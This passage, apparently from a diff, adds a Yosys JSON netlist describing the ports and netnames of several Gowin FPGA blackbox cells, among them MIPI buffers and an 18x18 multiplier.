"DO_LPTX1_N": { + "direction": "input", + "bits": [ 114 ] + }, + "DO_LPTX1_P": { + "direction": "input", + "bits": [ 115 ] + }, + "DO_LPTX2_N": { + "direction": "input", + "bits": [ 116 ] + }, + "DO_LPTX2_P": { + "direction": "input", + "bits": [ 117 ] + }, + "DO_LPTX3_N": { + "direction": "input", + "bits": [ 118 ] + }, + "DO_LPTX3_P": { + "direction": "input", + "bits": [ 119 ] + }, + "DO_LPTXCK_N": { + "direction": "input", + "bits": [ 120 ] + }, + "DO_LPTXCK_P": { + "direction": "input", + "bits": [ 121 ] + }, + "LPTX_EN_CK": { + "direction": "input", + "bits": [ 122 ] + }, + "LPTX_EN_D0": { + "direction": "input", + "bits": [ 123 ] + }, + "LPTX_EN_D1": { + "direction": "input", + "bits": [ 124 ] + }, + "LPTX_EN_D2": { + "direction": "input", + "bits": [ 125 ] + }, + "LPTX_EN_D3": { + "direction": "input", + "bits": [ 126 ] + }, + "BYTE_LENDIAN": { + "direction": "input", + "bits": [ 127 ] + }, + "HSRX_STOP": { + "direction": "input", + "bits": [ 128 ] + }, + "LPRX_ULP_LN0": { + "direction": "input", + "bits": [ 129 ] + }, + "LPRX_ULP_LN1": { + "direction": "input", + "bits": [ 130 ] + }, + "LPRX_ULP_LN2": { + "direction": "input", + "bits": [ 131 ] + }, + "LPRX_ULP_LN3": { + "direction": "input", + "bits": [ 132 ] + }, + "LPRX_ULP_CK": { + "direction": "input", + "bits": [ 133 ] + }, + "PWRON": { + "direction": "input", + "bits": [ 134 ] + }, + "RESET": { + "direction": "input", + "bits": [ 135 ] + }, + "DESKEW_LNSEL": { + "direction": "input", + "bits": [ 136, 137, 138 ] + }, + "DESKEW_MTH": { + "direction": "input", + "bits": [ 139, 140, 141, 142, 143, 144, 145, 146 ] + }, + "DESKEW_OWVAL": { + "direction": "input", + "bits": [ 147, 148, 149, 150, 151, 152, 153 ] + }, + "DESKEW_REQ": { + "direction": "input", + "bits": [ 154 ] + }, + "DRST_N": { + "direction": "input", + "bits": [ 155 ] + }, + "ONE_BYTE0_MATCH": { + "direction": "input", + "bits": [ 156 ] + }, + "WORD_LENDIAN": { + "direction": "input", + "bits": [ 157 ] + }, + "FIFO_RD_STD": { + "direction": "input", + "bits": [ 158, 159, 160 ] + } + }, + "cells": { + }, + "netnames": { + "BYTE_LENDIAN": { + "hide_name": 0, + "bits": [ 127 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1964.7-1964.19" + } + }, + "CK_N": { + "hide_name": 0, + "bits": [ 82 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1951.8-1951.12" + } + }, + "CK_P": { + "hide_name": 0, + "bits": [ 83 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1951.14-1951.18" + } + }, + "D0LN_HSRXD": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1945.15-1945.25" + } + }, + "D0LN_HSRXD_VLD": { + "hide_name": 0, + "bits": [ 66 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1946.8-1946.22" + } + }, + "D0LN_HSRX_DREN": { + "hide_name": 0, + "bits": [ 102 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1954.7-1954.21" + } + }, + "D1LN_HSRXD": { + "hide_name": 0, + "bits": [ 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1945.27-1945.37" + } + }, + "D1LN_HSRXD_VLD": { + "hide_name": 0, + "bits": [ 67 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1946.23-1946.37" + } + }, + "D1LN_HSRX_DREN": { + "hide_name": 0, + "bits": [ 103 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1954.24-1954.38" + } + }, + "D2LN_HSRXD": { + "hide_name": 0, + "bits": [ 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1945.39-1945.49" + } + }, + "D2LN_HSRXD_VLD": { + "hide_name": 0, + "bits": [ 68 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1946.38-1946.52" + } + }, + "D2LN_HSRX_DREN": { + "hide_name": 0, + "bits": [ 104 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1954.40-1954.54" + } + }, + "D3LN_HSRXD": { + "hide_name": 0, + "bits": [ 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1945.51-1945.61" + } + }, + "D3LN_HSRXD_VLD": { + "hide_name": 0, + "bits": [ 69 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1946.53-1946.67" + } + }, + "D3LN_HSRX_DREN": { + "hide_name": 0, + "bits": [ 105 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1954.56-1954.70" + } + }, + "DESKEW_ERROR": { + "hide_name": 0, + "bits": [ 81 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1950.8-1950.20" + } + }, + "DESKEW_LNSEL": { + "hide_name": 0, + "bits": [ 136, 137, 138 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1969.13-1969.25" + } + }, + "DESKEW_MTH": { + "hide_name": 0, + "bits": [ 139, 140, 141, 142, 143, 144, 145, 146 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1970.13-1970.23" + } + }, + "DESKEW_OWVAL": { + "hide_name": 0, + "bits": [ 147, 148, 149, 150, 151, 152, 153 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1971.13-1971.25" + } + }, + "DESKEW_REQ": { + "hide_name": 0, + "bits": [ 154 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1972.7-1972.17" + } + }, + "DI_LPRX0_N": { + "hide_name": 0, + "bits": [ 70 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1947.8-1947.18" + } + }, + "DI_LPRX0_P": { + "hide_name": 0, + "bits": [ 71 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1947.20-1947.30" + } + }, + "DI_LPRX1_N": { + "hide_name": 0, + "bits": [ 72 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1947.32-1947.42" + } + }, + "DI_LPRX1_P": { + "hide_name": 0, + "bits": [ 73 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1947.44-1947.54" + } + }, + "DI_LPRX2_N": { + "hide_name": 0, + "bits": [ 74 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1947.56-1947.66" + } + }, + "DI_LPRX2_P": { + "hide_name": 0, + "bits": [ 75 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1947.68-1947.78" + } + }, + "DI_LPRX3_N": { + "hide_name": 0, + "bits": [ 76 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1947.80-1947.90" + } + }, + "DI_LPRX3_P": { + "hide_name": 0, + "bits": [ 77 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1947.92-1947.102" + } + }, + "DI_LPRXCK_N": { + "hide_name": 0, + "bits": [ 78 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1948.8-1948.19" + } + }, + "DI_LPRXCK_P": { + "hide_name": 0, + "bits": [ 79 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1948.21-1948.32" + } + }, + "DO_LPTX0_N": { + "hide_name": 0, + "bits": [ 112 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1961.7-1961.17" + } + }, + "DO_LPTX0_P": { + "hide_name": 0, + "bits": [ 113 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1961.19-1961.29" + } + }, + "DO_LPTX1_N": { + "hide_name": 0, + "bits": [ 114 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1961.31-1961.41" + } + }, + "DO_LPTX1_P": { + "hide_name": 0, + "bits": [ 115 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1961.43-1961.53" + } + }, + "DO_LPTX2_N": { + "hide_name": 0, + "bits": [ 116 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1961.55-1961.65" + } + }, + "DO_LPTX2_P": { + "hide_name": 0, + "bits": [ 117 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1961.67-1961.77" + } + }, + "DO_LPTX3_N": { + "hide_name": 0, + "bits": [ 118 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1961.79-1961.89" + } + }, + "DO_LPTX3_P": { + "hide_name": 0, + "bits": [ 119 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1961.91-1961.101" + } + }, + "DO_LPTXCK_N": { + "hide_name": 0, + "bits": [ 120 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1962.7-1962.18" + } + }, + "DO_LPTXCK_P": { + "hide_name": 0, + "bits": [ 121 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1962.20-1962.31" + } + }, + "DRST_N": { + "hide_name": 0, + "bits": [ 155 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1973.7-1973.13" + } + }, + "FIFO_RD_STD": { + "hide_name": 0, + "bits": [ 158, 159, 160 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1976.13-1976.24" + } + }, + "HSRX_EN_CK": { + "hide_name": 0, + "bits": [ 106 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1955.7-1955.17" + } + }, + "HSRX_ODTEN_CK": { + "hide_name": 0, + "bits": [ 97 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1953.7-1953.20" + } + }, + "HSRX_ODTEN_D0": { + "hide_name": 0, + "bits": [ 98 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1953.22-1953.35" + } + }, + "HSRX_ODTEN_D1": { + "hide_name": 0, + "bits": [ 99 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1953.38-1953.51" + } + }, + "HSRX_ODTEN_D2": { + "hide_name": 0, + "bits": [ 100 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1953.53-1953.66" + } + }, + "HSRX_ODTEN_D3": { + "hide_name": 0, + "bits": [ 101 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1953.68-1953.81" + } + }, + "HSRX_STOP": { + "hide_name": 0, + "bits": [ 128 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1965.7-1965.16" + } + }, + "HS_8BIT_MODE": { + "hide_name": 0, + "bits": [ 107 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1956.7-1956.19" + } + }, + "LALIGN_EN": { + "hide_name": 0, + "bits": [ 110 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1959.7-1959.16" + } + }, + "LPRX_EN_CK": { + "hide_name": 0, + "bits": [ 92 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1952.7-1952.17" + } + }, + "LPRX_EN_D0": { + "hide_name": 0, + "bits": [ 93 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1952.19-1952.29" + } + }, + "LPRX_EN_D1": { + "hide_name": 0, + "bits": [ 94 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1952.31-1952.41" + } + }, + "LPRX_EN_D2": { + "hide_name": 0, + "bits": [ 95 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1952.43-1952.53" + } + }, + "LPRX_EN_D3": { + "hide_name": 0, + "bits": [ 96 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1952.55-1952.65" + } + }, + "LPRX_ULP_CK": { + "hide_name": 0, + "bits": [ 133 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1966.63-1966.74" + } + }, + "LPRX_ULP_LN0": { + "hide_name": 0, + "bits": [ 129 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1966.7-1966.19" + } + }, + "LPRX_ULP_LN1": { + "hide_name": 0, + "bits": [ 130 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1966.21-1966.33" + } + }, + "LPRX_ULP_LN2": { + "hide_name": 0, + "bits": [ 131 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1966.35-1966.47" + } + }, + "LPRX_ULP_LN3": { + "hide_name": 0, + "bits": [ 132 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1966.49-1966.61" + } + }, + "LPTX_EN_CK": { + "hide_name": 0, + "bits": [ 122 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1963.7-1963.17" + } + }, + "LPTX_EN_D0": { + "hide_name": 0, + "bits": [ 123 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1963.19-1963.29" + } + }, + "LPTX_EN_D1": { + "hide_name": 0, + "bits": [ 124 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1963.31-1963.41" + } + }, + "LPTX_EN_D2": { + "hide_name": 0, + "bits": [ 125 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1963.43-1963.53" + } + }, + "LPTX_EN_D3": { + "hide_name": 0, + "bits": [ 126 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1963.55-1963.65" + } + }, + "ONE_BYTE0_MATCH": { + "hide_name": 0, + "bits": [ 156 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1974.7-1974.22" + } + }, + "PWRON": { + "hide_name": 0, + "bits": [ 134 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1967.7-1967.12" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 135 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1968.7-1968.12" + } + }, + "RX0_N": { + "hide_name": 0, + "bits": [ 84 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1951.20-1951.25" + } + }, + "RX0_P": { + "hide_name": 0, + "bits": [ 85 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1951.27-1951.32" + } + }, + "RX1_N": { + "hide_name": 0, + "bits": [ 86 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1951.34-1951.39" + } + }, + "RX1_P": { + "hide_name": 0, + "bits": [ 87 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1951.41-1951.46" + } + }, + "RX2_N": { + "hide_name": 0, + "bits": [ 88 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1951.48-1951.53" + } + }, + "RX2_P": { + "hide_name": 0, + "bits": [ 89 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1951.55-1951.60" + } + }, + "RX3_N": { + "hide_name": 0, + "bits": [ 90 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1951.62-1951.67" + } + }, + "RX3_P": { + "hide_name": 0, + "bits": [ 91 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1951.69-1951.74" + } + }, + "RX_CLK_1X": { + "hide_name": 0, + "bits": [ 108 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1957.7-1957.16" + } + }, + "RX_CLK_O": { + "hide_name": 0, + "bits": [ 80 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1949.8-1949.16" + } + }, + "RX_INVERT": { + "hide_name": 0, + "bits": [ 109 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1958.7-1958.16" + } + }, + "WALIGN_BY": { + "hide_name": 0, + "bits": [ 111 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1960.7-1960.16" + } + }, + "WORD_LENDIAN": { + "hide_name": 0, + "bits": [ 157 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1975.7-1975.19" + } + } + } + }, + "MIPI_IBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1438.1-1444.10" + }, + "ports": { + "OH": { + "direction": "output", + "bits": [ 2 ] + }, + "OL": { + "direction": "output", + "bits": [ 3 ] + }, + "OB": { + "direction": "output", + "bits": [ 4 ] + }, + "IO": { + "direction": "inout", + "bits": [ 5 ] + }, + "IOB": { + "direction": "inout", + "bits": [ 6 ] + }, + "I": { + "direction": "input", + "bits": [ 7 ] + }, + "IB": { + "direction": "input", + "bits": [ 8 ] + }, + "OEN": { + "direction": "input", + "bits": [ 9 ] + }, + "OENB": { + "direction": "input", + "bits": [ 10 ] + }, + "HSREN": { + "direction": "input", + "bits": [ 11 ] + } + }, + "cells": { + }, + "netnames": { + "HSREN": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1443.7-1443.12" + } + }, + "I": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1441.8-1441.9" + } + }, + "IB": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1441.11-1441.13" + } + }, + "IO": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1440.7-1440.9" + } + }, + "IOB": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1440.11-1440.14" + } + }, + "OB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1439.16-1439.18" + } + }, + "OEN": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1442.7-1442.10" + } + }, + "OENB": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1442.12-1442.16" + } + }, + "OH": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1439.8-1439.10" + } + }, + "OL": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1439.12-1439.14" + } + } + } + }, + "MIPI_IBUF_HS": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1446.1-1449.10" + }, + "ports": { + "OH": { + "direction": "output", + "bits": [ 2 ] + }, + "I": { + "direction": "input", + "bits": [ 3 ] + }, + "IB": { + "direction": "input", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1448.8-1448.9" + } + }, + "IB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1448.11-1448.13" + } + }, + "OH": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1447.8-1447.10" + } + } + } + }, + "MIPI_IBUF_LP": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1451.1-1456.10" + }, + "ports": { + "OL": { + "direction": "output", + "bits": [ 2 ] + }, + "OB": { + "direction": "output", + "bits": [ 3 ] + }, + "I": { + "direction": "input", + "bits": [ 4 ] + }, + "IB": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1454.8-1454.9" + } + }, + "IB": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1455.7-1455.9" + } + }, + "OB": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1453.8-1453.10" + } + }, + "OL": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1452.8-1452.10" + } + } + } + }, + "MIPI_OBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1458.1-1461.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "OB": { + "direction": "output", + "bits": [ 3 ] + }, + "I": { + "direction": "input", + "bits": [ 4 ] + }, + "IB": { + "direction": "input", + "bits": [ 5 ] + }, + "MODESEL": { + "direction": "input", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1460.8-1460.9" + } + }, + "IB": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1460.11-1460.13" + } + }, + "MODESEL": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1460.15-1460.22" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1459.8-1459.9" + } + }, + "OB": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1459.11-1459.13" + } + } + } + }, + "MIPI_OBUF_A": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1463.1-1466.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "OB": { + "direction": "output", + "bits": [ 3 ] + }, + "I": { + "direction": "input", + "bits": [ 4 ] + }, + "IB": { + "direction": "input", + "bits": [ 5 ] + }, + "IL": { + "direction": "input", + "bits": [ 6 ] + }, + "MODESEL": { + "direction": "input", + "bits": [ 7 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1465.8-1465.9" + } + }, + "IB": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1465.11-1465.13" + } + }, + "IL": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1465.15-1465.17" + } + }, + "MODESEL": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1465.19-1465.26" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1464.8-1464.9" + } + }, + "OB": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1464.11-1464.13" + } + } + } + }, + "MULT18X18": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1206.1-1224.10" + }, + "parameter_default_values": { + "AREG": "0", + "ASIGN_REG": "0", + "BREG": "0", + "BSIGN_REG": "0", + "MULT_RESET_MODE": "SYNC", + "OUT_REG": "0", + "PIPE_REG": "0", + "SOA_REG": "0" + }, + "ports": { + "A": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ] + }, + "SIA": { + "direction": "input", + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ] + }, + "B": { + "direction": "input", + "bits": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ] + }, + "SIB": { + "direction": "input", + "bits": [ 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ] + }, + "ASIGN": { + "direction": "input", + "bits": [ 74 ] + }, + "BSIGN": { + "direction": "input", + "bits": [ 75 ] + }, + "ASEL": { + "direction": "input", + "bits": [ 76 ] + }, + "BSEL": { + "direction": "input", + "bits": [ 77 ] + }, + "CE": { + "direction": "input", + "bits": [ 78 ] + }, + "CLK": { + "direction": "input", + "bits": [ 79 ] + }, + "RESET": { + "direction": "input", + "bits": [ 80 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116 ] + }, + "SOA": { + "direction": "output", + "bits": [ 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134 ] + }, + "SOB": { + "direction": "output", + "bits": [ 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152 ] + } + }, + "cells": { + }, + "netnames": { + "A": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 